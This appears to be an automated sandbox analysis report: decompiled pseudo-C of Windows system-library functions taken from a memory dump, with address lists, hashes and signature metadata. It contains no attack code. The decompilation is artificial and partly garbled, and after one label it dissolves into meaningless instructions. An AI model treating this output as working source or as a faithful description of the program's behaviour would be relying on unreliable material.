				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x1c2d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E01B57D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E01C08CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E01B79E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E01B7B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E01B7CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E01B57D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E01C08F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E01B7AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x1c28628; // 0x0
								_v68 = _t77;
								_t78 =  *0x1c2862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x1c28628; // 0x0
							_t116 =  *0x1c2862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x01b5b94c
0x01b5b956
0x01b5b95c
0x01b5b95e
0x01b5b964
0x01b5b969
0x01b5b96d
0x01b5b96d
0x01b5b970
0x01b5b974
0x01b5b97a
0x01b5badf
0x01b5badf
0x01b5bae2
0x01b5bae4
0x01b5bae6
0x01b5baf0
0x01ba2cb8
0x01b5baf6
0x01b5baf6
0x01b5baf6
0x01b5bafd
0x01b5bb1f
0x01b5bb1f
0x01b5baff
0x01b5bb00
0x01b5bb00
0x01b5bb03
0x01b5bb03
0x01b5bacb
0x01b5bacf
0x01b5bad0
0x01b5bad1
0x01b5badc
0x01b5badc
0x01b5b980
0x01b5b980
0x01b5b988
0x01b5b98b
0x01b5b98d
0x01b5b990
0x01b5b993
0x01b5b999
0x01b5b99b
0x01b5b9a1
0x01b5b9a5
0x01b5b9aa
0x01b5b9b0
0x01b5b9bb
0x01b5b9c0
0x01b5b9c3
0x01b5b9ca
0x01b5b9cc
0x01b5b9cf
0x01b5b9d3
0x01b5b9d7
0x01b5ba94
0x01b5ba94
0x01b5ba98
0x01b5baa3
0x01ba2ccb
0x01b5baa9
0x01b5baa9
0x01b5baa9
0x01b5bab1
0x01ba2cd5
0x01ba2cdd
0x01ba2cdd
0x01b5babb
0x01b5babc
0x01b5bac2
0x01b5bac3
0x01b5bac3
0x01b5bac6
0x00000000
0x01b5b9dd
0x01b5b9dd
0x01b5b9e7
0x01b5b9e7
0x01b5b9ec
0x01b5b9ec
0x01b5b9f1
0x01b5b9f5
0x01b5b9fa
0x01b5ba00
0x01b5ba0c
0x01b5ba10
0x01b5ba10
0x01b5ba12
0x01b5ba18
0x00000000
0x00000000
0x01b5bb26
0x01b5bb26
0x01b5ba1e
0x01b5ba1e
0x01b5ba23
0x01b5ba25
0x01b5ba2c
0x01b5ba30
0x01b5ba35
0x01b5ba35
0x01b5ba41
0x01b5ba46
0x01b5ba4c
0x01b5ba50
0x01b5ba54
0x01b5ba6a
0x01b5ba6e
0x01b5ba70
0x01b5ba74
0x01b5ba78
0x01b5ba7a
0x01b5ba7c
0x01b5ba8e
0x01b5ba90
0x01b5ba92
0x01b5bb14
0x01b5bb14
0x01b5bb16
0x01b5bb16
0x00000000
0x01b5ba7c
0x01b5bb0a
0x01b5bb0d
0x00000000
0x00000000
0x00000000
0x01b5bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B5B9A5

Memory Dump Source

Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 00562a76051828508a184b060f427cfa1b3214257cd9d72fde7c5aedd15031b6
Instruction ID: 16e5069dbd26ad1fcf1bfbf5f3cf281e5b24d82c02ccf2c1d72322fbb3b6da2c
Opcode Fuzzy Hash: 00562a76051828508a184b060f427cfa1b3214257cd9d72fde7c5aedd15031b6
Instruction Fuzzy Hash: 8C516D71608341CFC769DF28C580A2ABBF6FB88610F5489AEF99587355DB70E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01B62581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E01B62581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35, char _a1546912178) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				signed int _t244;
				signed int _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t258;
				signed int _t261;
				signed int _t269;
				signed int _t275;
				signed int _t277;
				void* _t279;
				signed int _t280;
				unsigned int _t283;
				signed int _t287;
				signed int _t289;
				signed int _t293;
				intOrPtr _t311;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t327;
				signed int _t328;
				void* _t330;
				void* _t331;
				signed int _t332;
				signed int _t334;
				signed int _t336;
				void* _t337;
				void* _t339;

				_t334 = _t336;
				_t337 = _t336 - 0x4c;
				_v8 =  *0x1c2d360 ^ _t334;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t327 = 0x1c2b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t283 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t339 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t275 = 0x48;
				_t303 = 0 | _t339 == 0x00000000;
				_t320 = 0;
				_v37 = _t339 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t275 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t328 = 0xc0000106;
						goto L32;
					} else {
						_t327 = L01B54620(_t283,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
						_v52 = _t327;
						__eflags = _t327;
						if(_t327 == 0) {
							_t328 = 0xc0000017;
							goto L32;
						} else {
							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
							_t50 = _t327 + 0x48; // 0x48
							_t322 = _t50;
							_t303 = _v32;
							 *(_t327 + 0x3c) = _t275;
							_t277 = 0;
							 *((short*)(_t327 + 0x30)) = _v48;
							__eflags = _t303;
							if(_t303 != 0) {
								 *(_t327 + 0x18) = _t322;
								__eflags = _t303 - 0x1c28478;
								 *_t327 = ((0 | _t303 == 0x01c28478) - 0x00000001 & 0xfffffffb) + 7;
								E01B7F3E0(_t322,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
								_t303 = _v32;
								_t337 = _t337 + 0xc;
								_t277 = 1;
								__eflags = _a8;
								_t322 = _t322 + (( *_t303 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t269 = E01BC39F2(_t322);
									_t303 = _v32;
									_t322 = _t269;
								}
							}
							_t287 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t328 = _v68;
								__eflags = 0;
								 *((short*)(_t322 - 2)) = 0;
								goto L32;
							} else {
								_t275 = _t327 + _t277 * 4;
								_v56 = _t275;
								do {
									__eflags = _t303;
									if(_t303 != 0) {
										_t237 =  *(_v60 + _t287 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t275 =  *(_v60 + _t287 * 4);
										 *(_t275 + 0x18) = _t322;
										_t241 =  *(_v60 + _t287 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M01B62959))) {
												case 0:
													__ax =  *0x1c28488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E01B7F3E0(__edi,  *0x1c2848c, __ax & 0x0000ffff);
														__eax =  *0x1c28488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E01B7F3E0(_t322, _v80, _v64);
													_t264 = _v64;
													goto L26;
												case 2:
													 *0x1c28480 & 0x0000ffff = E01B7F3E0(__edi,  *0x1c28484,  *0x1c28480 & 0x0000ffff);
													__eax =  *0x1c28480 & 0x0000ffff;
													__eax = ( *0x1c28480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E01B7F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E01B7F3E0(_t322, _v76, _v36);
														_t264 = _v36;
													}
													L26:
													_t337 = _t337 + 0xc;
													_t322 = _t322 + (_t264 >> 1) * 2 + 2;
													__eflags = _t322;
													L27:
													_push(0x3b);
													_pop(_t266);
													 *((short*)(_t322 - 2)) = _t266;
													goto L28;
												case 6:
													__ebx =  *0x1c2575c;
													__eflags = __ebx - 0x1c2575c;
													if(__ebx != 0x1c2575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E01B7F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x1c2575c;
														} while (__ebx != 0x1c2575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1c28478 & 0x0000ffff = E01B7F3E0(__edi,  *0x1c2847c,  *0x1c28478 & 0x0000ffff);
													__eax =  *0x1c28478 & 0x0000ffff;
													__eax = ( *0x1c28478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E01BC39F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1c26e58 & 0x0000ffff = E01B7F3E0(__edi,  *0x1c26e5c,  *0x1c26e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1c26e58 & 0x0000ffff;
													__eax = ( *0x1c26e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t287 = _v16;
													_t303 = _v32;
													L29:
													_t275 = _t275 + 4;
													__eflags = _t275;
													_v56 = _t275;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t287 = _t287 + 1;
									_v16 = _t287;
									__eflags = _t287 - _v48;
								} while (_t287 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t320 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M01B62935))) {
							case 0:
								__ax =  *0x1c28488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t303 =  &_v64;
								_v80 = E01B62E3E(0,  &_v64);
								_t275 = _t275 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1c28480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1c28480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E01B4EEF0(0x1c279a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E01B4EB70(__ecx, 0x1c279a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t328;
												if(_t328 < 0) {
													L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t283 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1c27b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L01B54620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E01B4EB70(__ecx, 0x1c279a0);
										__eax = _v52;
										L36:
										_pop(_t321);
										_pop(_t329);
										__eflags = _v8 ^ _t334;
										_pop(_t276);
										return E01B7B640(_t216, _t276, _v8 ^ _t334, _t303, _t321, _t329);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t271 = _v56;
								if(_v56 != 0) {
									_t303 =  &_v36;
									_t273 = E01B62E3E(_t271,  &_v36);
									_t283 = _v36;
									_v76 = _t273;
								}
								if(_t283 == 0) {
									goto L44;
								} else {
									_t275 = _t275 + 2 + _t283;
								}
								goto L14;
							case 6:
								__eax =  *0x1c25764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1c28478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1c28478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1c26e58 & 0x0000ffff;
								__eax = ( *0x1c26e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t320 = _t320 + 1;
								if(_t320 >= _v48) {
									goto L16;
								} else {
									_t303 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					asm("o16 sub [esi-0x49d81fff], dh");
					 *_t327 =  *_t327 + _t334;
					_t330 = _t327 + 1;
					 *((intOrPtr*)(_t330 - 0x49d9faff)) =  *((intOrPtr*)(_t330 - 0x49d9faff)) - 1;
					 *_t322 =  *_t322 + _t275;
					_t279 = 0x25;
					 *0x201ba5b =  *0x201ba5b + _t330;
					 *((intOrPtr*)(_t330 - 0x49d77fff)) =  *((intOrPtr*)(_t330 - 0x49d77fff)) - _t330;
					_t331 = _t330 + _t330;
					asm("daa");
					_push(ds);
					 *((intOrPtr*)(_t331 - 0x49d7b1ff)) =  *((intOrPtr*)(_t331 - 0x49d7b1ff)) - 1;
					_a35 = _a35 + _t279;
					asm("fcomp dword [ebx-0x46]");
					 *((intOrPtr*)(_t241 +  &_a1546912178)) =  *((intOrPtr*)(_t241 +  &_a1546912178)) + _t331;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x1c0ff00);
					E01B8D08C(_t279, _t322, _t331);
					_v44 =  *[fs:0x18];
					_t323 = 0;
					 *_a24 = 0;
					_t280 = _a12;
					__eflags = _t280;
					if(_t280 == 0) {
						_t244 = 0xc0000100;
					} else {
						_v8 = 0;
						_t332 = 0xc0000100;
						_v52 = 0xc0000100;
						_t246 = 4;
						while(1) {
							_v40 = _t246;
							__eflags = _t246;
							if(_t246 == 0) {
								break;
							}
							_t293 = _t246 * 0xc;
							_v48 = _t293;
							__eflags = _t280 -  *((intOrPtr*)(_t293 + 0x1b11664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t261 = E01B7E5C0(_a8,  *((intOrPtr*)(_t293 + 0x1b11668)), _t280);
									_t337 = _t337 + 0xc;
									__eflags = _t261;
									if(__eflags == 0) {
										_t332 = E01BB51BE(_t280,  *((intOrPtr*)(_v48 + 0x1b1166c)), _a16, _t323, _t332, __eflags, _a20, _a24);
										_v52 = _t332;
										break;
									} else {
										_t246 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t246 = _t246 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t332;
						__eflags = _t332;
						if(_t332 < 0) {
							__eflags = _t332 - 0xc0000100;
							if(_t332 == 0xc0000100) {
								_t289 = _a4;
								__eflags = _t289;
								if(_t289 != 0) {
									_v36 = _t289;
									__eflags =  *_t289 - _t323;
									if( *_t289 == _t323) {
										_t332 = 0xc0000100;
										goto L76;
									} else {
										_t311 =  *((intOrPtr*)(_v44 + 0x30));
										_t248 =  *((intOrPtr*)(_t311 + 0x10));
										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t289;
										if( *((intOrPtr*)(_t248 + 0x48)) == _t289) {
											__eflags =  *(_t311 + 0x1c);
											if( *(_t311 + 0x1c) == 0) {
												L106:
												_t332 = E01B62AE4( &_v36, _a8, _t280, _a16, _a20, _a24);
												_v32 = _t332;
												__eflags = _t332 - 0xc0000100;
												if(_t332 != 0xc0000100) {
													goto L69;
												} else {
													_t323 = 1;
													_t289 = _v36;
													goto L75;
												}
											} else {
												_t251 = E01B46600( *(_t311 + 0x1c));
												__eflags = _t251;
												if(_t251 != 0) {
													goto L106;
												} else {
													_t289 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t332 = E01B62C50(_t289, _a8, _t280, _a16, _a20, _a24, _t323);
											L76:
											_v32 = _t332;
											goto L69;
										}
									}
									goto L108;
								} else {
									E01B4EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t332 = _a24;
									_t258 = E01B62AE4( &_v36, _a8, _t280, _a16, _a20, _t332);
									_v32 = _t258;
									__eflags = _t258 - 0xc0000100;
									if(_t258 == 0xc0000100) {
										_v32 = E01B62C50(_v36, _a8, _t280, _a16, _a20, _t332, 1);
									}
									_v8 = _t323;
									E01B62ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t244 = _t332;
					}
					L70:
					return E01B8D0D1(_t244);
				}
				L108:
			}

0x01b62584
0x01b62586
0x01b62590
0x01b62596
0x01b62597
0x01b62598
0x01b62599
0x01b6259e
0x01b625a4
0x01b625a9
0x01b625ac
0x01b625ae
0x01b625b1
0x01b625b2
0x01b625b5
0x01b625b8
0x01b625bb
0x01b625bc
0x01b625bf
0x01b625c2
0x01b625c5
0x01b625c6
0x01b625cb
0x01b625ce
0x01b625d8
0x01b625db
0x01b625dd
0x01b625de
0x01b625e1
0x01b625e3
0x01b625e9
0x01b626da
0x01b626da
0x01b626dd
0x01b626e2
0x01ba5b56
0x00000000
0x01b626e8
0x01b626f9
0x01b626fb
0x01b626fe
0x01b62700
0x01ba5b60
0x00000000
0x01b62706
0x01b62706
0x01b6270a
0x01b6270a
0x01b6270d
0x01b62713
0x01b62716
0x01b62718
0x01b6271c
0x01b6271e
0x01ba5b6c
0x01ba5b6f
0x01ba5b7f
0x01ba5b89
0x01ba5b8e
0x01ba5b93
0x01ba5b96
0x01ba5b9c
0x01ba5ba0
0x01ba5ba3
0x01ba5bab
0x01ba5bb0
0x01ba5bb3
0x01ba5bb3
0x01ba5ba3
0x01b62724
0x01b62726
0x01b62729
0x01b6272c
0x01b6279d
0x01b6279d
0x01b627a0
0x01b627a2
0x00000000
0x01b6272e
0x01b6272e
0x01b62731
0x01b62734
0x01b62734
0x01b62736
0x01ba5bc1
0x01ba5bc1
0x01ba5bc4
0x00000000
0x01ba5bca
0x01ba5bca
0x01ba5bcd
0x00000000
0x01ba5bd3
0x00000000
0x01ba5bd3
0x01ba5bcd
0x01b6273c
0x01b6273c
0x01b62742
0x01b62747
0x01b6274a
0x01b6274d
0x01b62750
0x00000000
0x01b62756
0x01b62756
0x00000000
0x01b62902
0x01b62908
0x01b6290b
0x00000000
0x01b62911
0x01b6291c
0x01b62921
0x00000000
0x01b62921
0x00000000
0x00000000
0x01b62880
0x01b62887
0x01b6288c
0x00000000
0x00000000
0x01b62805
0x01b6280a
0x01b62814
0x01b62816
0x00000000
0x00000000
0x01b6281e
0x01b62821
0x01b62823
0x00000000
0x01b62829
0x01b62829
0x01b62831
0x01b6283c
0x01b6283e
0x00000000
0x01b6283e
0x00000000
0x00000000
0x01b6284e
0x01b62850
0x01b62851
0x01b62854
0x01b62857
0x01b6285a
0x01b6285c
0x01b6285d
0x00000000
0x00000000
0x01b6275d
0x01b62761
0x00000000
0x01b62767
0x01b6276e
0x01b62773
0x01b62773
0x01b62776
0x01b62778
0x01b6277e
0x01b6277e
0x01b62781
0x01b62781
0x01b62783
0x01b62784
0x00000000
0x00000000
0x01ba5bd8
0x01ba5bde
0x01ba5be4
0x01ba5be6
0x01ba5be8
0x01ba5be9
0x01ba5bee
0x01ba5bf8
0x01ba5bff
0x01ba5c01
0x01ba5c04
0x01ba5c07
0x01ba5c0b
0x01ba5c0d
0x01ba5c0d
0x01ba5c15
0x01ba5c18
0x01ba5c1b
0x01ba5c1b
0x01ba5c1e
0x00000000
0x00000000
0x01b628c3
0x01b628c8
0x01b628d2
0x01b628d4
0x01b628d8
0x01b628db
0x01ba5c26
0x01ba5c28
0x01ba5c2d
0x01ba5c2d
0x00000000
0x00000000
0x01ba5c34
0x01ba5c36
0x01ba5c49
0x01ba5c4e
0x01ba5c54
0x01ba5c5b
0x01ba5c5d
0x01ba5c60
0x01b62788
0x01b62788
0x01b6278b
0x01b6278e
0x01b6278e
0x01b6278e
0x01b62791
0x00000000
0x00000000
0x01b62756
0x01b62750
0x00000000
0x01b62794
0x01b62794
0x01b62795
0x01b62798
0x01b62798
0x00000000
0x01b62734
0x01b6272c
0x01b62700
0x01b625ef
0x01b625ef
0x01b625ef
0x01b625f2
0x01b625f8
0x00000000
0x00000000
0x01b625fe
0x00000000
0x01b628e6
0x01b628ec
0x01b628ef
0x01b628f5
0x01b628f8
0x01b628f8
0x00000000
0x01b628f8
0x00000000
0x00000000
0x01b62866
0x01b62866
0x01b62876
0x01b62879
0x00000000
0x00000000
0x01b627e0
0x01b627e7
0x01b627e9
0x01b627eb
0x01ba5afd
0x00000000
0x01ba5afd
0x00000000
0x00000000
0x01b62633
0x01b62638
0x01b6263b
0x01b6263c
0x01b6263e
0x01b62640
0x01b62642
0x01b62647
0x01b62649
0x01b6264e
0x01b62650
0x01b62653
0x01b62659
0x01b626a2
0x01b626a7
0x01b626ac
0x01b626b2
0x01ba5b11
0x01ba5b15
0x01ba5b17
0x00000000
0x01b626b8
0x01b626b8
0x01b626ba
0x01b627a6
0x01b627a6
0x01b627a9
0x01b627ab
0x01b627b9
0x01b627b9
0x01b627be
0x01b627c1
0x01b627c3
0x01b627c5
0x01b627c7
0x01ba5c74
0x01ba5c79
0x01ba5c79
0x01b627c7
0x00000000
0x01b626c0
0x01b626c0
0x01b626c3
0x01b626c6
0x01b626c6
0x01b626c9
0x01b626c9
0x00000000
0x01b626c9
0x01b626ba
0x01b6265b
0x01b6265b
0x01b6265e
0x01b62667
0x01b6266d
0x01b62677
0x01b6267c
0x01b6267f
0x01b62681
0x01ba5b49
0x01ba5b4e
0x01b627cd
0x01b627d0
0x01b627d1
0x01b627d2
0x01b627d4
0x01b627dd
0x01b62687
0x01b62687
0x01b6268a
0x01b6268b
0x01b6268e
0x01b6268f
0x01b62691
0x01b62696
0x01b62698
0x01b6269d
0x01b6269f
0x00000000
0x01b6269f
0x01b62681
0x00000000
0x00000000
0x01b62846
0x00000000
0x00000000
0x01b62605
0x01b6260a
0x01b6260c
0x01b62611
0x01b62616
0x01b62619
0x01b62619
0x01b6261e
0x00000000
0x01b62624
0x01b62627
0x01b62627
0x00000000
0x00000000
0x01ba5b1f
0x00000000
0x00000000
0x01b62894
0x01b6289b
0x01b6289d
0x01b628a1
0x01ba5b2b
0x01ba5b2e
0x01ba5b2e
0x01b628a7
0x01b628a9
0x01ba5b04
0x01ba5b09
0x01ba5b09
0x01ba5b09
0x00000000
0x00000000
0x01ba5b35
0x01ba5b3c
0x01b628fb
0x01b628fb
0x01b626cc
0x01b626cc
0x01b626d0
0x00000000
0x01b626d2
0x01b626d2
0x00000000
0x01b626d2
0x00000000
0x00000000
0x01b625fe
0x01b6292d
0x01b62930
0x01b62935
0x01b62939
0x01b62940
0x01b62945
0x01b62946
0x01b6294c
0x01b6294e
0x01b62954
0x01b6295a
0x01b62960
0x01b62962
0x01b62965
